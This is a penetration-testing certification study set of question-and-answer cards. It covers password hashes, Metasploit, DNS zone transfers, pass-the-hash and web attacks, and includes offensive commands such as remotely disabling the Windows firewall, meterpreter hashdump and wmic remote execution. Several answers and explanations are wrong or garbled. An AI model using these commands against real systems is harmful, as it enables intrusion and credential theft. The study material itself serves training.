Pen Test Study

Which of the following statements describes the NT hash algorithm? 1. Entire password up to 256 characters hashed using MD4, case is preserved, and hashes are not salted. 2. Passwords less than 15 characters, padded and split into two 7 character passwords, two parts hashed with DES and combined, case is NOT preserved, and hashes are not salted. 3. Passwords are less than 256 characters, padded and split into 128 character passwords, two parts hashed with MD4 and combined, case is preserved, and hashes are not salted. 4. Entire password up to 256 characters hashed using DES, case is preserved, and hashes are salted.

1. Entire password up to 256 characters hashed using MD4, case is preserved, and hashes are not salted. Explanation) The NT algorithm is simultaneously simpler and far stronger than LANMAN. The user's password is hashed using a straight MD4 hash algorithm. Passwords of up 256 characters are supported on modern Windows machines. The NT hash algorithm preserves the alphabetic case of a password, and doesn't do any of the splitting action of LANMAN. Neither the LANMAN nor NT hash creation process uses a salt.

Which regional Internet Registry (RIR) cover North America? 1. ARIN 2. RIPE NCC 3. ARPNIC 4.LACNIC

1. ARIN

What tool could you use to capture and crack LANMAN Challenge/Response over a network? 1. Cain 2. John the Ripper 3. Wireshark 4. WinCrack

1. Cain. Explanation) Cain and Able supports the capture and cracking of Windows NT LANMAN Challenge/Responses and the and NTLMv1 authentication exchange over a network John the Ripper will crack NT password hashes, but it does not include a sniffer and needs to be used with other tools. WinCrack is Password Crack spyware. Finding it on a computer name means that it is infected with malware. it cracks files enciphered by the tool WINCRYPT and does not capture network traffic Though Wireshark is a sniffer, it does not decode passwords by itself

You have been contracted to analyze an environment for potential weaknesses in physical and network security. Which term correctly classifies this project? 1. Vulnerability Assessment 2. Risk Assessment 3. Security Remediation 4. Penetration Test

1. Vulnerability Assessment

What section of the penetration test or ethical hacking engagement final report is used to communicate the agreed upon scope of the test? 1. Introduction 2. Conclusions 3. Executive Summary 4. Findings

1. Introduction. Explanation) The introduction component of the report is a one-to-three page section provides an overview of the project so that the reader understands when the project occurred, what was included in the scope (and possibly items purposely left out of the scope, if applicable), and who participated in the test.

What is the name main difference between LANMAN and NTLMv1 challenge/responses? 1. NTLMv1 starts with the NT hash, whereas LANMAN starts with the LANMAN hash 2. NTLMv1 utilizes DES, whereas LANMAN utilizes MD4 3. NTLMv1 splits the hash into 3 digits eight-byte pieces, whereas LANMAN splits the hash into 3 seven-byte pieces 4. NTLMv1 only pads 18 bytes

1. NTLMv1 starts with the NT hash, whereas LANMAN starts with the LANMAN hash. Explanation) Outside of this the two are the same.

What will Nessus do when the "Enable safe checks configuration setting is enabled? 1. Nessus will not run dangerous plugins 2. Nessus will conduct a test run to ensure that the tool is configured correctly prior to the scan 3. Nessus will run a safety check on the target system 4. Nessus will restrict activity to the local host

1. Nessus will not run dangerous plugins. Explanation) "Enable safe checks" is a default configuration is Nessus. With this enabled, Nessus will not run dangerous plugins such as password cracking plugins.

You are a new pen tester and looking around in Metasploit payloads directory and see a directory called singles. What are singes? 1. Payloads that include both functionality and communcation bundled together 2. Payload with a single communication option 3. Payloads that work only one time 4. Payloads with a single functionality

1. Payloads that include both functionality and communcation bundled together. Explanation) SIngles are stand alone payloads that include all of the pieces in one module. Both functionality of the payload and its communication with the attackers are bundles together in each of these payloads.

A penetration tester wishes to stop the Windows Firewall process on a remote host running Windows Vista. She issues the following commands: C:\Documents and Settings\Owner>net use Z: \\fileserver\shared /user:Administrator The command completed successfully C:\Documents and Settings\Ownder>Z: Z:\>sc stop MpsSVC [SC] ControlService FAILED 1062 The service has been stopped. Z:\> A check of the remote host indicates that Windows Firewall is still running. Why did the command fail? 1. The sc command needs to be passed the IP address of the target. 2. The user does not have the access level needed to stop the firewall 3. The remote server timed out and did not complete the command 4. The kernel prevented the command from being executed Z:\> sc stop MpsSvc [SC] ControlSrvice FAILED 1062

1. The sc command needs to be passed the IP address of the target.

What is the primary purpose of the following command? $ dig @ns1.sans.org sans.org -t AXFR 1. Transfer the DNS zone 2. Discover the SOA record for sans.org 3. Discover the MX record for sans.org 4. Discover the name server IP address for sans.org 5. Transfer incremental sans.org zone changes to ns1.sans.org

1. Transfer the DNS zone. Explanation) With a -t flag, we can specify zone transfer - Full zone transfer: -t AXFR

What meterpreter command is used to get the SAM database and its hashes from a target machine? 1. hashdump 2. dumpsam 3. dumphash 4. SAMdump 5. lanmandump

1. hashdump. Explanation) When the priv module is loaded, run the hashdump command to get the SAM database and its hashes from the target machine: meterpreter > hashdump You should see the SAM database from the target machine on your screen.

What file does John the Ripper store its current state in so that it can resume operation where it left off if it crashes? 1. john.rec 2. john.stat 3.john.sav 4.john.pot

1. john.rec. Explanation) Every ten minutes, John updates a file in its run directory called john.rec, a recovery file in the event of a crash. Also, if you hit CTRL-C while John is running, it will update the john.rec file before it exits. If you hit CTRL-C twice quickly, John will terminate without updating john.rec. When John is invoked, it checks to see if a john.rec file is present. If it is, John resumes cracking where it left off. It doesn't waste your time trying guesses that were already done last it ran (well, except for up to the last 10 minutes before it crashed)

Which of the following are valid Windows Active Directory authentication protocols? 1. LANMAN challenge/response, NTLMv1, NTLMv2, Microsoft Kerberos 2. LANMAN, NT hashing, NTLMv1, NTLMv2 3. LANMAN, NT Hashing, NTLM, Microsoft Kerberos 4. LANMAN challenge/response, NTLMv1, NTLMv2, NT hashing

1.LANMAN challenge/response, NTLMv1, NTLMv2, Microsoft Kerberos. Explanation) LANMAN and NT hashes are stored in the SAM database and in Active Directory, Windows uses a variety of challenge-response authentication protocols for authentication across the network derived from these hashes, including LANMAN Challenge/Response, NTLMv1, NTLMv2, and Microsoft Kerberos.

When pen testing a network you compromise a switch with a simple password string attack and begin a network packet capture. Which is the best way to analyze the VoIP traffic that you captured on the system? 1). Redirect all VoIP traffic to your workstation and use a VoIP client such as Ekiga or Jphone to replay the traffic. 2). Export the pcap file from the switch to your workstation and convert the file using Cain. 3). Capture the VoIP packets using boolean filters and import the pcap file into a media player like the Windows media player or Quicktime. 4). Install a switch-based sniffer to capture traffic and filter the packets using the command "debug ip packet detailed"

2). Export the pcap file from the switch to your workstation and convert the file using Cain. Explanation) In this case, Cain would have to be used to convert the pcap file to a wav file for replay by a media player. Boolean filters will not output the packet data to a format that is readable by media players. The output will be in pcap format. If the the traffic is redirected to a machine with a VoIP client, the original conversation will terminate. As well, the applications mentioned above do not have the capability to record any conversations. In Linux, an application such as audacity could be used to capture the throughput of a sound card.

You have obtained the following hash below from the etc/shadow file. What are you able to discern simply by looking at this hash? - $1$uWeOhL6k$A4XDsB4COGqWaEpFjLLDe 1. A4XDsB4COGqWaEpFjLLDe. is an SHA1 hash that was created using the salt uWeOhL6k 2. A4XDsB4COGqWaEpFjLLDe. is an MD5 hash that was created using the salt uWeOhL6k. 3. A4XDsB4COGqWaEpFjLLDe. is a SHA1 hash that created using the salt $1$uWeOhL6k$ 4. A4XDsB4COGqWaEpFjLLDe. is an MD5 hash that was created using the salt $1$uWeOhL6k$

2. A4XDsB4COGqWaEpFjLLDe. is an MD5 hash that was created using the salt uWeOhL6k. Explanation) The fact that the hash begins with $1$ indicates that this is an MD% hash. the alt is included between the second and third dollar sign symbols, so the salt in this example would be uWeOhL6k. The actual hash consists of the remaining character after the third dollar sign, which is A4XDsB4COGqWaEpFjLLDe. in this example. SHA-1 is not supported by crypt. SHA-256 is represented by $5$, and SHA-512 is denoted $6$.

Which of the following best describes a client side exploit? 1. Attack of a service listening on a client system 2. Attack of a client application that retrieves content from the network 3. Attack on the physical machine 4. Attack that escalates user privileges to root or administrators

2. Attack of a client application that retrieves content from the network

You are pen testing using Metasploit and just started msfd, what limitation does msfd hae that you must beware of? 1. Only allows one instance of Metasploit to connect 2. Does not provide a method of authentication 3. Only runs on loopback interface 4. Picks a random TCP port at startup

2. Does not provide a method of authentication. Explanation) msfd does not provide a method for authentication or encryption .

While executing an NMAP NSE scan of a target network. the objective of the scan is to avoid leaving logs or otherwise impacting the target network. Which category on NMAP scripts should be avoided? 1. Safe 2. Intrusive 3. Discovery 4. Malware

2. Intrusive. Explanation) Intrusive category NSE scripts have the potential to leave logic, guess password, and otherwise impact the target network

What is the main difference between LANMAN challenge/response and NTLMv1? 1. NTLMv1 does not split the hash into 3 seven character pieces like LANMAN does. 2. NTLMv1 begins by using NT hashing instead of LANMAN hashing 3. NTLMv1 hash does not need padding before being split into 3 pieces like LANMAN does. 4. NTLMv1 uses a 16 bit hash instead of the 14 bit hash that LANMAN uses.

2. NTLMv1 begins by using NT hashing instead of LANMAN hashing

What is the purpose of the following command? C:\> wmic /node:[targetIP] /user:[admin_user] /password:[password] process call create [command] 1. Creating a service on remote Windows machine 2. Running a command on a remote Windows machine. 3. Listing the running processes on a remote Windows machine 4. Creating an admin account on a remote Windows macihine

2. Running a command on a remote Windows machine.

Analyze the command output below. Based on the output, what conclusion can correctly be made about the target? Starting Nmap 4.54 ( http://insecure.org ) at 2010-09-30 18:39 EDT Interesting ports on 192.168.116.9: PORT STATE SERVICE VERSION 8181/tcp open unknown 1. This target host is running a version of Linux. 2. The service running on 8181/tcp is not recognized. 3. The service running on 8181/tcp did not complete a handshake. 4. The target host is filtering access to 8181/tcp

2. The service running on 8181/tcp is not recognized.

Examine the output of the robots.txt file below. Which of the following describes the findings? *** output below *** # go away User-agent: * Disallow: / *** end of outout *** 1. Files within the user-agent directory are restricted 2. The site does not support web crawlers 3. The site logs user agent data 4. the file prohibits access to the root web folder

2. The site does not support web crawlers

You are conducting a penetration test of a company's web servers and would like a tool that includes a GUI and the ability to look for common errors and problems that you could find with a search engine such as google. Which web application scanning tool could you use to accomplish this? 1. Enum 2. Wikto 3. Nikto 4. N-Stalker

2. Wikto. Explanation) Wikto provides Nikto-style scanning from within a Windows GUI, adding in Google vulnerability scanning.

An analyst runs netstat and records the following network connection from host 10.10.1.25. What can be inferred from this information? CLOSED 2017-06-07 01:00:59z 10.10.1.25 0 195.22.009.061 0 1. 195.242.009.061 has attempted at least one failed connection to host 10.10.1.25 2. Host 10.10.1.25 is on a network that blocks IMCP message 3. 10.10.1.25 has made at least one successful connection to external host 195.242.009.061 4. External host 195.242.009.061 was blocked by a firewall

3. 10.10.1.25 has made at least one successful connection to external host 195.242.009.061. Explanation) If a network connection is shown in netstats output, the connection was successful. Closed could indicate the external host is no longer available but was at one time,

Which single tool could you use crack all of the password hashes below? - LanMan challege-response - APOP-MD5 - VNC-JDES - CRAM-MD5 - Oracle 1. Aircrack 2. NC 3. Cain 4. John the ripper

3. Cain

What difference would you expect to result from running the following commands: (1) $ dig @ns.domain.com target.com -t AXFR and (2) $ dig @ns.domain.com target.com -t IXFR=10022200301 1. Command (1) will display all information about a domain and command (2) will only provide 10022200301 bytes of information 2. Command (1) will display incremental information about a domain and command (2) will provide only 10022200301 bytes of information 3. Command (1) will display all information about a domain and command (2) will provide only incremental updates from SOA 10022200301 4. Command (1) will display information about a domain from the last time the comman was issued and command (2) will provide only incremental update from SOA 10022200301

3. Command (1) will display all information about a domain and command (2) will provide only incremental updates from SOA 10022200301.

During a pen test you have acquired a file called pix.dump. This file appears to be the output of the "show run" command which dumps the running config for the firewall. You notice a line below and suspect that the administrators have used a common term as a password. enable password 8Rlksdjfoajwfojawfifjawofj Which of the following techniqies could be used to unmask the password? 1. The output of the "show run" command on a Pix displays the clear text password by default instead of obfuscating with "****" 2. The unhiding feature of Cains GUI based application can be used to display the original password. 3. Compare the output to a list of commonly used terms within the organization using Cains password hashing module 4. Convert the password back to ASCII text be entering the string into an decoding application such as fgdump

3. Compare the output to a list of commonly used terms within the organization using Cains password hashing module. Explanation) There are some times during a penetration test that making educated guesses are worth while. Creating a list of commonly used terms for an organization and using the hash generator for Cain is one method for cracking or reverse engineering device passwords. It is also possible to either use the compromised device as a pivot point for the scan or reuse the password for other devices.tyg fr55

Analyze the excerpt from a packet capture below. Given the host is up, what conclusion can be correctly drawn about host 192.168.116.101? 1. It is providing services only on port 139/tcp 2. It is resetting connection attempts on tcp ports 130-140. 3. It is not responding to connection attempts on tcp ports 130-140 4. It is redirecting traffic on behalf of another host

3. It is not responding to connection attempts on tcp ports 130-140, Explanation) The packet capture shows the results of a scan directed to host 192.168.116.101 t ports 130-140. The connection requests are not receiving a response. The reason for that could be that the host is not able to respond, or it is unwilling to respond. In this case, the services on the target are being filtered, and the packets are being silently dropped.

Which of the following is a benefit of a pass the hash attack over traditional password attacks? 1. No alteration of the LSASS process 2. No triggering o the IDS signatures from the attack 3. No account lockout

3. No account lockout. Explanation) The advantages of pass the hash attacks are that they will not lock out user account because the attacker is slipping the hash directly into the LSASS process, the privilege level is that of the compromised hash and the attack can use native Windows file and print sharing tools to gather information on the system. intrusion detection systems have both signatures and protocol anomaly detection engines that can be configured to detect the use of applications such as psexec and monitor for abnormal traffic on well known ports. Finally the LSASS process is not corrupted to the point where it will fail, however technically, the process is corrupt when an executable string is entered into it's memory space.

You are pen testing a network and client side testing is within the scope. The system administrators do not want you to start testing until they have patched the systems you will be pen testing. Will waiting result in a valid pen test? 1. Yes, you want to find as few vulnerabilities as possible when pen testing 2. No, patching will increase the number of false positives 3. No, to make an accurate assessment of the risk you need to examine representative systems 4. Yes, patching will reduce the. number of false positives.

3. No, to make an accurate assessment of the risk you need to examine representative systems

Which of the following describes the pass-the-hash attack? 1. Password authentication is achieved by injecting code into the system authentication process (LSASS) causing it to crash. 2. Password hashes are inserted into the user input fields and are processed by LSASS. 3. Password authentication is bypassed by injecting a stolen password hash directly into the systems authentication process (LSASS) 4. Password hashes are captured and decrypted offline and the clear text results are inserted into the LSASS authentication fields.

3. Password authentication is bypassed by injecting a stolen password hash directly into the systems authentication process (LSASS)

How is the SQL command 'substring' used? 1. Search results from a query are concatenated to save bandwidth on the network 2. This command is installed during a penetration test through blind SQl Injection 3. This standard database subsystem populated text strings in the metadata. 4. Specific search results can be trimmed down to a specified position and length.

4. Specific search results can be trimmed down to a specified position and length.

Which of the following penetration testing methodologies, written by Toggemeister and Lee Lawson, provides step-by-step guides that include almost every aspect of penetration testing? 1. Open Web Application Security Project (OWASP) Testing Guide 2. Open Source Security Testing Methodology Manual (OSSTMM) 3. Penetration Testing Framework 4. NIST Special Publication 800-42: Guideline to Network Security Testing

3. Penetration Testing Framework. Explanation) The penetration testing framework by TOggmeister and Lee Lawson. This web site provides a step-by-step walk through of every aspect of a network penetration test, including very specific tools (with links to each and every tool) and the individual commands to use for each tool.

Which of the following is possible in some SQL injection vulnerabilities on certain types of databases that affects the underlying server OS? 1. Data query capabilities 2. Database structure retrieval 3. Shell command execution 4. Data manipulation

3. Shell command execution.

Which of the following TCP packet sequences are common during a SYN (or half open) scan? 1. The scanning computer sends SYN-ACK and no response is received from the target computer 2. The scanning computer sends SYN and SYN-FIN is received from the target computer 3. The scanning computer sends SYN and the target computer responds with RST-ACK 4. The scanning computer sends SYN-ACK and the target computer responds with RST-ACK

3. The scanning computer sends SYN and the target computer responds with RST-ACK. Explanation) A half open scan generates could generate any of the followong packet sequences: - Scanning computer sends SYN and target computer responds RST-ACK (The ACK flag is set, however sometimes not mentioned) - Scanning computer sends SYN and target computer responds SYN-ACK - Scanning computer sends SYN and target computer responds ICMP (port unreachable) - Scanning computer sends SYN and target computer no response (packet dropped)

A penetration tester successfully adds a directory to the %PATH% on a windows system. Which of the following situations can result from this change? 1. Windows System File Checker will detect the modification 2. The change will cause the system to boot into safe mode 3. The victim could execute the attackers version of an application 4. Windows will not be able to locate the system binaries

3. The victim could execute the attackers version of an application.

Which of the following best explains why you would want to clear the browser state (history, cache, and cookies) between examinations of web servers when you've been trapping and altering values with a non transparent proxy? 1. Trapping and changing response value is beneficial for web site testing but using the same cached values in your browser will prevent you from being able to change those values. 2. Values trapped and stored in the browser will reveal the techniques you've used to examine the web servers. 3. Values trapped and changed in the proxy, such as cookie, will be stored by the browser and may impact further testing. 4. Trapping and changing response values is beneficial for web site testing but will cause browser instability if not cleared.

3. Values trapped and changed in the proxy, such as cookie, will be stored by the browser and may impact further testing. Explanation) Clearing the browser state ensures you are starting off with a new slate. If you change a cookie or other value and go back to test the site later, you could easily forget that the browser has stored an altered value, possibly impacting your findings or further testing. Having an altered value stored in your browser may reveal a single value that you used, but this isn't the main reason you would clear browser state and your machine and browser cache should be under your control. There is no evidence that cached browser values would decrease the ability to change any cached values via a REQUEST trap before they were sent to the server. Cookies sent back from a single browser to a web server, even if altered, would not be deemed an attack.

You are pen testing a Windows system remotely via a raw netcat shell. You are searching for text files containing the text "hACKed". What command could you use to find all files in the \temp directory that contain the the text "hACKed"? 1. find \temp\*.txt | search nocase("hacked") 2. type \temp\*.text | find "hacked" 3. type \temp\*.txt | find /i "hacked" 4. find \temp\*.txt | grep "hacked"

3. type \temp\*.txt | find /i "hacked". Explanation) The command\temp\*.txt | find /i "hacked" will find all instances of the case insensitive string "hacked".

You are running a vulnerability scan on a remote network and the traffic is not making it to the remote target system. You investigate the connection issue and determine that the traffic is not even making it to the internal interface of your local network firewall. What is the most likely problem? 1. Your network firewall is blocking the traffic 2. The remote site you are testing is blocking the traffic 3. Your ISP is blocking the traffic 4. A host based firewall is blocking the traffic 5. The NAT or PAT tables on your network based firewall are filling up and dropping the traffic

4. A host based firewall is blocking the traffic. Explanation) Since the traffic is not making it to the firewall the only possible solution is that host based firewall is blocking then traffic.

What defense may be used to prevent Cross Site Request Forgery (XSRF) attacks? 1. Use HTTPS 2. Use a static POST variable 3. Disable persistent cookies 4. Implement CAPTCHA systems

4. Implement CAPTCHA systems. Explanation) Though CAPTCHA systems may cause users inconvenience, the required user interaction is valid defense against XSRF attacks. XSRF typically takes place over GET variables and works with both persistent and non-peristent cookies and complex variables even work over HTTP POST.

Which of the following applications would be vulnerable to a service-side exploit? 1. Outlook 2. Firefox 3. Adobe Acrobat 4. Internet Information Services

4. Internet Information Services. Explanation) Service-side exploits attack a service that is listening on the network. IIS (Internet Information Services) is the only listed server application, the others are client applications.

Which of these classes of tools is best suited for finding vulnerabilities in a web application that was built by a clients in-house developers? 1. Automated vulnerability scanner (Like Nessus) 2. Scriptable port scanner (like nmap) 3. Automated web application scanner (like nikto) 4. Non-transparent web proxy (like zap)

4. Non-transparent web proxy (like zap). Explanation) Nikto is designed to scan for common flaws in the underlying web server and well known software installed on top of it. Nmap and Nessus have limited abilities to scan web applications, but are not designed for the kind of work. ZAP and other web proxies, however, give an attacker or penetration tester full control over every part of the request sent to the web server, allowing an experienced tester to attack any application, no matter who built it or how it is deployed.

What kind of specific information may be discovered by querying the metadata of a database? 1. System health and memory usage 2. Available shell commands 3. Web application firewall settings 4. Table and column information

4. Table and column information. Explanation) The metadata is information that describes the database itself and the data that it stores. In other words, the metadata tells us the names of the tables and their columns, among other things.

While performing a web application assessment, you start to analyze a Base64 encoded authorization cookie. How could you take a closer look at this encoded element if OWASP ZAP was your only available tool? 1. The information gathering plugins could be used to discover the cookie's authorization algorithm. 2. The b64_decode() function could be scripted to trap the encoded cookie value upon each new request. 3. The manual request editor could be used to launch an automated analysis of the encoded cookie value. 4. The hash calculator could be used to decode, modify, then re-encode the cookie value.

4. The hash calculator could be used to decode, modify, then re-encode the cookie value. Explanation) This hash calculator is immensely useful when analyzing responses that come from websites. For example, suppose a cookie comes back every time the user authenticates to a website. The tester could try to URL or Base64 decode the cookie's value to see if it is meaningful. Values can then be re-encoded with the simple click of a button.

You've been asked to test a non-transparent proxy to make sure it is working. After confirming the browser is correctly pointed at the proxy, you try to browse a web site. The browser indicates it is "loading" but never displays any part of the page. Checking the proxy, you see a valid request in the proxy from your browser. Checking the response to the proxy, you see the results displayed in the accompanying screenshot. Which of the following answers is the most likely reason the browser hasn't displayed the page yet? *** Insert Question 12 *** 1. The proxy is likely hung and must be restarted. 2. The proxy is configured to trap responses 3. The sire you are trying to reach is currently down 4. The proxy is configured to trap requests 5. The cannot be accessed through a proxy.

4. The proxy is configured to trap requests. Explanation) Non-transparent proxies typically provide the ability to trap responses and requests to allow for viewing and altering data. The request was seen by the proxy , so we know it went out. Since the proxy also has a response, we know that it received a response from the server. If a trap was set on the requests, the trap would have to be acknowledged before it went out to the server, so a response wouldn't yet be seen. However, if a trap was set on responses, the proxy would have the response but wouldn't send it to the browser until the trap was acknowledged. If the site was down, not accessible through a proxy, or the proxy was hung, you wouldn't see the web servers response in the proxy.

You are performing a penetration test on a web application using ZAP. After logging in with a valid account you analyze the cookie, and see that it shows your username as "cmfuzg9sjfsjfalsjdfljaf=". You wish to replace your username with a different valid username. Explain the process for replacing the username. 1. Use ZAPs Active Scan function with the XSS plug-in enabled to gather cookies from other web site users, the use the cookies gathered in your attack 2. Replace the username in your cookie with a different valid username, when you send the cookie back to the server it will automatically encode the username correctly 3. Use ZAPs Brute Force function to have it create cookies with possible valid username and use a script to submit them to the website one at a time to identify more usernames 4. Use ZAPs Encode/Decode/Hash function to determine the type of encoding being used then encode a different valid username using the same encoding and replace the value in your cookie

4. Use ZAPs Encode/Decode/Hash function to determine the type of encoding being used then encode a different valid username using the same encoding and replace the value in your cookie

Which of the following is in the JavaScript variable used to store a variable? 1. window.cookie 2. browser.cookie 3. session.cookie 4. document.cookie

4. document.cookie

You are pen testing a Windows system remotely via a raw netcat shell. You have determined that the built in Windows firewall is blocking your inbound ftp file transfer, what command would you use to disable the Windows firewall. 1. netsh firewall disable 2. ipconfig firewall set off 3. net advfirewall set opmode disable 4. netsh advfirewall set allprofiles off

4. netsh advfirewall set allprofiles off. Explanation) This command will turn off the built-in Windows firewall

You have gained access to a database server during a penetration test and want to select the username and password of the administrators account in the "Users" table. Which of the following SQL statements would accomplish this task? 1. where username = 'administrator, select username, password from Users 2. select username, password where username = 'administrator' from Users; 3. select from Users, username password where username = 'administrator'; 4. select username, password from Users where username = 'administrator';

4. select username, password from Users where username = 'administrator';

Where are the password representations stored by default on Active Directory domain controllers? 1. %Windowa%\ntim\ntim.dat 2. HKEY_LOCAL_USER\Software\Microsoft\Windows 3. C:\Program Files\Windows NT\ 4. HKEY_LOCAL_MACHINES\Software\Microsoft\Windows 5. %systemroom%\ntds\ntds.dit

5. %systemroot%\ntds\ntds.dit. Explanation) The file ntds is the main Active Directory database.NTDS stands for NT Directory Services. The DIT stands for Directory Information Tree. The ntds.dit file on a particular domain controller contains all naming contexts hosted by that domain controller, including the Configuration and Schema naming contexts. A Global Catalog server stores the partial naming context replicas in the NTDS.dit right along with the full naming context for its domain.

Which of the follwoing describes Cross Site Request Forgery (XSRF)? 1. Advanced embedded JavaScript is used to turn a victim web browser into a public proxy server. 2. Embedded JavaScript causes a victims browser to request sensitive information 3. Malicious HTML tricks a web browser into injecting HTML into a third party site 4. Injected HTML content causes a victims browser to invoke functionality o a target web site.

Injected HTMl 4. Injected HTML content causes a victims browser to invoke functionality o a target web site. Explanation) The XSRF attack vector involves a bad guy injecting content that includes very specially crafted HTML elements (but not browser scripts) onto a third party website. When an unsuspecting victim user reads the content posted by that bad guy on a third party site, the content makes the victim's browser access an e-commerce site on which the victim has an account and engage in a transaction as the victim.

What is the benefit of having a cheat sheet reference of database system tables when performing SQL Injection?

These tables contain metadata that can be queried to gain additional helpful information

The scope of your engagement includes a target organization located in California with a /24 block of addresses that they claim to completely own. Which site could you utilize to confirm that you have been accurate information before starting reconnaissance activities?

www.arin.net